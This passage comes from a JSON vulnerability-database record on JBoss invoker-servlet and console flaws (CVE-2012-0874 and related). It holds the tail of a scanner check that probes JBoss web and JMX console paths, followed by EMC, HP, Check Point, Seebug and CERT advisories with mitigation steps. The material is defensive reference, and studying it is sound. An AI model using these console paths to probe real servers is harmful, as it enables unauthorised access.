referenced advisories for mitigation steps.\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/632656/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/460597/100/0/threaded\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/web-console/ServerInfo.jsp\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"<title>JBoss Management Console - Server Information</title>\",\n check_header: TRUE, extra_check: \"Management Console\")) {\n report = 'It was possible to access the JBoss Web Console at ' +\n http_report_vuln_url(port: port, url: url, url_only: TRUE);\n}\n\nurl = dir + \"/jmx-console/\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"<title>JBoss JMX Management Console\",\n check_header: TRUE)) {\n report += '\\n\\nIt was possible to access the JBoss JMX Management Console at ' +\n http_report_vuln_url(port: port, url: url, url_only: TRUE);\n}\n\nif (report) {\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:46:48", "description": "Bugtraq ID:57552\r\nCVE ID:CVE-2012-0874\r\n\r\nJBOSS\u662f\u4e00\u4e2a\u57fa\u4e8eJ2EE\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u5e94\u7528\u670d\u52a1\u5668\u3002\r\n\u5728\u67d0\u4e9b\u914d\u7f6e\u4e0b\uff0c\u5141\u8bb8\u5bf9JMXInvokerHAServlet\u548cEJBInvokerHAServlet invoker servlet\u8fdb\u884c\u672a\u9a8c\u8bc1\u8bbf\u95ee\u3002\u5b89\u5168\u62e6\u622a\u5668\u7b2c\u4e8c\u5c42\u9a8c\u8bc1\u53ef\u9632\u6b62\u76f4\u63a5\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u4f46\u662f\u5982\u679c\u62e6\u622a\u5668\u9519\u8bef\u914d\u7f6e\u6216\u4e0d\u6b63\u786e\u7981\u7528\uff0c\u53ef\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n0\r\nRed Hat JBoss Enterprise Web Platform for RHEL 5 Server 5\r\nRed Hat JBoss Enterprise Web Platform for RHEL 4ES 5\r\nRed Hat JBoss Enterprise Web Platform for RHEL 4AS 5\r\nRed Hat JBoss Enterprise Application Platform for RHEL 5 Server 5\r\nRed Hat JBoss Enterprise Application Platform for RHEL 4ES 5\r\nRed Hat JBoss Enterprise Application Platform for RHEL 4AS 5\r\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://rhn.redhat.com/errata/RHSA-2013-0194.html", "cvss3": {}, "published": "2013-02-03T00:00:00", "title": "JBoss Enterprise Application Platform \u591a\u4e2a\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e(CVE-2012-0874)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0874"], "modified": "2013-02-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60624", "id": "SSV:60624", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:13", "description": "A remote code execution vulnerability is exist in JBoss Enterprise Application Platform. A remote attacker can exploit this vulnerability to execute arbitrary code in the targeted system.", "cvss3": {}, "published": "2019-01-29T00:00:00", "type": "checkpoint_advisories", "title": "JBoss Enterprise Application Platform Invoker Servlets Remote Code Execution (CVE-2012-0874)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0874"], "modified": "2019-01-29T00:00:00", "id": "CPAI-2019-0078", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:54", "description": "Code execution.", "edition": 1, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "EMC Data Protection Advisor / Connectrix Manager security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-0874"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13495", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13495", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n\r\n\r\nESA-2013-094.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2013-094: EMC Data Protection Advisor JBOSS Remote Code Execution Vulnerability\r\n\r\nEMC Identifier: ESA-2013-094 \r\n\r\nCVE Identifier: CVE-2012-0874\r\n\r\nSeverity Rating: CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nAffected products: \r\n\u2022\tAll EMC Data Protection Advisor (DPA) versions of 5.x\r\n\r\n\r\nSummary: \r\nEMC DPA may be vulnerable to remote code execution vulnerability.\r\n\r\n\r\nDetails: \r\nThe DPA Illuminator service (DPA_Illuminator.exe) listening on port 8090 (tcp/http) and 8453 (tcp/https) embeds JBOSS servlets (JMXInvokerServlet and EJBInvokerServlet). These JBOSS servlets are vulnerable to remote code execution vulnerability. The vulnerability could be exploited to execute remote code with NT AUTHORITY\SYSTEM privileges. See http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0874 for more details. \r\n\r\nAffected JBOSS servlets are not required for DPA functionality. This vulnerability does not affect EMC DPA versions 6.x. \r\n\r\n Follow the steps below to remove the vulnerable JBOSS servlets from DPA 5.x system and mitigate the security risk.\r\n\r\n\r\nResolution: \r\nThe following products contain the resolution to this issue:\r\n\u2022\tEMC DPA version 6.x and later.\r\n\r\nWorkaround for DPA 5.x versions: \r\n1.\tStop the DPA Illuminator service.\r\n2.\tOpen <Install dir>\Illuminator_Server\JBoss\server\illuminator\deploy. For example: C:\Program Files\EMC\DPA\Illuminator_Server\JBoss\server\illuminator\deploy\r\n3.\tDelete http-invoker.sar directory.\r\n4.\tStart the DPA Illuminator service.\r\n\r\nEMC strongly recommends all customers upgrade to version 6.x or higher or apply workaround for 5.x versions at the earliest opportunity.\r\n\r\n\r\nLink to remedies:\r\n\r\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/829_Data-Protection-Advisor\r\n \r\nCredits: \r\nEMC would like to thank Andrea Micalizzi (aka rgod) for discovering this issue. \r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlKzP2AACgkQtjd2rKp+ALxoNACgtBXByJQv59K6/7EynNjxA9DQ\r\ntOwAoNl/PWIbRnLriOvbaIbcm/tICI5P\r\n=Jq4q\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "ESA-2013-094: EMC Data Protection Advisor JBOSS Remote Code Execution Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-0874"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30174", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30174", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:23", "description": "Web console and management instruments are available without authentication.", "edition": 1, "cvss3": {}, "published": "2007-02-23T00:00:00", "title": "JBoss insecure defaults", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2007-1156", "CVE-2007-1036", "CVE-2007-1157"], "modified": "2007-02-23T00:00:00", "id": "SECURITYVULNS:VULN:7280", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7280", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:16", "description": "Crossite scripting, code execution.", "edition": 2, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "HP ProCurve Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13501", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13501", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:44", "description": "Code execution, session reusage, SQL injection.", "edition": 2, "cvss3": {}, "published": "2013-09-11T00:00:00", "title": "HP ProCurve Manager, HP Identity Driven Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "SECURITYVULNS:VULN:13282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13282", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 2\r\n\r\nHPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-10-15\r\nLast Updated: 2013-10-15\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.x, v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please used the\r\nAutoUpdate feature of PCM.\r\n\r\nNote about CVE-2005-2572 and PCM v3.X: To address CVE-2005-2572 on PCMv3, a\r\nseparate security tool must be run. This security tool can be found as\r\nfollows. Browse to the HP Networking Support Lookup Tool\r\nhttp://www.hp.com/networking/support :\r\n\r\nEnter a PCM v3.x product number, such as J9173A, J9174A, J9175A, or J9176A\r\ninto the "Auto Search" text box\r\nCheck the appropriate product\r\nPress "Display Selected"\r\nClick "Software Downloads"\r\nIn the "Other" section, there will be a "Security Tools" download which\r\ncontains a zip file with several executables.\r\nTo protect your PCM v3.x installation, use the pcm320-DB-restrict tool. There\r\nare 32bit and 64bit versions available. Please read the release notes\r\nincluded in the Security Tool download.\r\nIMPORTANT: If you will be updating a protected PCM v3 installation to PCM v4,\r\nyou will need to run the pcm320-DB-unrestrict utility prior to updating.\r\n\r\nProduct and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHP PCM v3.x ( CVE-2005-2572)\r\n HP PCM v3.x see Resolution text above.\r\n J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\nVersion:2 (rev.2) - 15 October 2013 Added PCM v3\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJdvz4ACgkQ4B86/C0qfVmLhwCghN6a1Opqqcbd3dLqlnnfQWci\r\nUR8AoIhyX+Ht4By5+4v503IdvTZKcaWg\r\n=3nFW\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "[security bulletin] HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30182", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30182", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 1\r\n\r\nHPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-09-09\r\nLast Updated: 2013-09-09\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please used the\r\nAutoUpdate feature of PCM. Product and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlIuBgcACgkQ4B86/C0qfVlvcwCggBleIQ2jJ5kVsOs0jnnfN0nJ\r\njqkAnjs4Po+SPJx4rm+WXolFai2juOmy\r\n=5yU4\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-09-11T00:00:00", "title": "[security bulletin] HPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "SECURITYVULNS:DOC:29808", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29808", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:51:47", "description": "### Overview\n\nThe JBoss Application Server may allow unauthenticated, remote access to the administrative console.\n\n### Description\n\n[JBoss](<http://www.jboss.com/>) is an open source application server implemented in Java. Because it is Java-based, JBoss can be used on any operating system that supports Java. JBoss servers can be remotely managed through a web-based administrative interface.\n\nIf JBoss is installed without using the advanced installer options, the JBoss [security features](<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>) will need to be configured manually. If a JBoss server is configured to allow unauthenticated access to the administrative interface, and is accessible from a remote network, then an attacker may be able to access and modify data on the server. \n \nNote that it may be possible to enumerate vulnerable servers by using search engines. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to gain administrative access to a JBoss Application Server. Once an attacker has access, they may be able to access and modify data on that server. \n \n--- \n \n### Solution\n\n**Use the installer** \nUsing the advanced installer options will configure JBoss to only allow authenticated administrative access. \n \n--- \n \n \n**Enable role based security** \n \nEnabling role based security may mitigate this vulnerability. See the [SecureTheJmxConsole](<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole>) page on the JBoss wiki for more information. \n \n**Restrict access** \n \nRestricting access to the administrative interface to trusted hosts may mitigate this vulnerability. See the [LimitAccessToCertainClients](<http://wiki.jboss.org/wiki/Wiki.jsp?page=LimitAccessToCertainClients>) page on the JBoss wiki for more information. \n \n--- \n \n### Vendor Information\n\n632656\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Red Hat, Inc. __ Affected\n\nUpdated: February 21, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe JBoss AS console manager should always be secured prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss AS installer gives users the ability to password protect the console manager. If the user did not use the installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed manually:\n\n<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole>\n * 